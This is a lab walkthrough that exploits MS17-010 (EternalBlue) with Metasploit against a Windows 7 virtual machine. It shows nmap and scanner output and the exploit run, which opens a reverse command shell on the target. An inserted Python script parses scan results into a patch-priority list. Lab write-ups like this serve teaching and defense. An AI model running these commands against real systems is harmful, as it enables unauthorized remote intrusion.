Exploiting MS17-010 with MSF

Exploiting MS17-010

Lab environment

1. Kali Linux (IP: 192.168.131.131)
2. Windows 7 Home edition (IP: 192.168.131.133, port 445 open)

Scanning

1. Use nmap to scan the target host for open ports (the scan shows port 445 is open):
root@kali:~# nmap 192.168.131.133
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 13:22 CST
Nmap scan report for 192.168.131.133
Host is up (0.00027s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:0C:29:3B:F1:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds

2. Start MSF (command: msfconsole):
root@kali:~# msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 
3. Search MSF for modules related to MS17-010 (command: search ms17-010):
msf > search ms17-010

Matching Modules
================

   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf > 
4. First use the vulnerability scanner module to check whether the target host is affected (command: use auxiliary/scanner/smb/smb_ms17_010):
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > 
5. Show which options the module requires (command: show options):
msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads
msf auxiliary(scanner/smb/smb_ms17_010) >
6. Set the target host IP (command: set rhosts 192.168.131.133):
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.131.133
rhosts => 192.168.131.133
msf auxiliary(scanner/smb/smb_ms17_010) >
7. Start the scan (command: exploit):
msf auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.131.133:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) > 
The scanner reports that the host is vulnerable to MS17-010.
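From the defender's side, the two transcripts above (the nmap port table and the smb_ms17_010 scanner result) are exactly what a vulnerability-management team needs to turn into a patch list: which hosts expose 445/tcp, and which of those the scanner flags as likely vulnerable. The following Python script is an added example, not code from the original post or from Metasploit; it parses both output formats into one per-host record and returns the hosts that should be patched first. The sample inputs are constructed from the page's transcripts, and the second scanner line (a not-vulnerable host, 192.168.131.134) is invented to exercise the negative case.

```python
"""Triage helper: combine nmap port output and Metasploit smb_ms17_010 scanner
output into per-host records, then list hosts that expose SMB (445/tcp) and are
flagged as likely vulnerable to MS17-010.

Added example (not from the original post). Inputs below are constructed.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: nmap output as shown on the page (one host).
NMAP_OUTPUT = """\
Nmap scan report for 192.168.131.133
Host is up (0.00027s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
MAC Address: 00:0C:29:3B:F1:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds
"""

# Constructed sample: smb_ms17_010 scanner output. The first line is the
# page's result; the second (a host that is not vulnerable) is invented.
MSF_SCANNER_OUTPUT = """\
[+] 192.168.131.133:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.131.134:445   - Host does NOT appear vulnerable.
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# "Nmap scan report for 10.0.0.1" or "Nmap scan report for name (10.0.0.1)"
NMAP_HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
NMAP_PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
MSF_VULN_RE = re.compile(
    r"^\[\+\] (\d+\.\d+\.\d+\.\d+):\d+\s+- Host is likely VULNERABLE to MS17-010! - (.+)$")
MSF_NOTVULN_RE = re.compile(
    r"^\[-\] (\d+\.\d+\.\d+\.\d+):\d+\s+- Host does NOT appear vulnerable")


@dataclass
class HostRecord:
    ip: str
    open_ports: set = field(default_factory=set)
    ms17_010: str = "unknown"  # "likely_vulnerable", "not_vulnerable" or "unknown"
    os_banner: str = ""

    @property
    def smb_exposed(self) -> bool:
        return 445 in self.open_ports


def parse_nmap(text: str, hosts: dict) -> dict:
    """Collect open ports per host from nmap's normal output."""
    current = None
    for line in text.splitlines():
        m = NMAP_HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), HostRecord(m.group(1)))
            continue
        m = NMAP_PORT_RE.match(line)
        if m and current is not None and m.group(3) == "open":
            current.open_ports.add(int(m.group(1)))
    return hosts


def parse_msf_scanner(text: str, hosts: dict) -> dict:
    """Record the smb_ms17_010 verdict (and OS banner, if any) per host."""
    for line in text.splitlines():
        m = MSF_VULN_RE.match(line)
        if m:
            rec = hosts.setdefault(m.group(1), HostRecord(m.group(1)))
            rec.ms17_010 = "likely_vulnerable"
            rec.os_banner = m.group(2).strip()
            continue
        m = MSF_NOTVULN_RE.match(line)
        if m:
            rec = hosts.setdefault(m.group(1), HostRecord(m.group(1)))
            rec.ms17_010 = "not_vulnerable"
    return hosts


def triage(nmap_text: str, msf_text: str) -> dict:
    """Merge both sources into one {ip: HostRecord} mapping."""
    hosts: dict = {}
    parse_nmap(nmap_text, hosts)
    parse_msf_scanner(msf_text, hosts)
    return hosts


def priority_list(hosts: dict) -> list:
    """Hosts to patch first: SMB reachable and flagged likely vulnerable."""
    return sorted(ip for ip, h in hosts.items()
                  if h.smb_exposed and h.ms17_010 == "likely_vulnerable")


if __name__ == "__main__":
    records = triage(NMAP_OUTPUT, MSF_SCANNER_OUTPUT)
    for ip, rec in sorted(records.items()):
        print(f"{ip}: smb_exposed={rec.smb_exposed} ms17_010={rec.ms17_010} {rec.os_banner}")
    print("patch first:", priority_list(records))
```

A host that appears only in the scanner output (no nmap record) is kept with an empty port set, so it is reported as "not exposed" rather than silently dropped; in practice you would feed both tools the same target list so the two views line up.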

Exploitation

1. Start MSF and search for ms17-010:
msf > search ms17-010

Matching Modules
================

   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf > 
2. Use the exploit module exploit/windows/smb/ms17_010_eternalblue, which returns a shell (command: use exploit/windows/smb/ms17_010_eternalblue), and view its required options:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(windows/smb/ms17_010_eternalblue) > 
3. Set the target host (command: set rhost 192.168.131.133):
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.131.133
rhost => 192.168.131.133
4. Launch the exploit (command: exploit):
msf exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.131.131:4444 
[*] 192.168.131.133:445 - Connecting to target for exploitation.
[+] 192.168.131.133:445 - Connection established for exploitation.
[+] 192.168.131.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.131.133:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.131.133:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.131.133:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.131.133:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
[+] 192.168.131.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.131.133:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.131.133:445 - Sending all but last fragment of exploit packet
[*] 192.168.131.133:445 - Starting non-paged pool grooming
[+] 192.168.131.133:445 - Sending SMBv2 buffers
[+] 192.168.131.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.131.133:445 - Sending final SMBv2 buffers.
[*] 192.168.131.133:445 - Sending last fragment of exploit packet!
[*] 192.168.131.133:445 - Receiving response from exploit packet
[+] 192.168.131.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.131.133:445 - Sending egg to corrupted connection.
[*] 192.168.131.133:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.131.131:4444 -> 192.168.131.133:49162) at 2020-09-10 13:47:40 +0800
[+] 192.168.131.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.131.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.131.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>
A shell on the target has been obtained.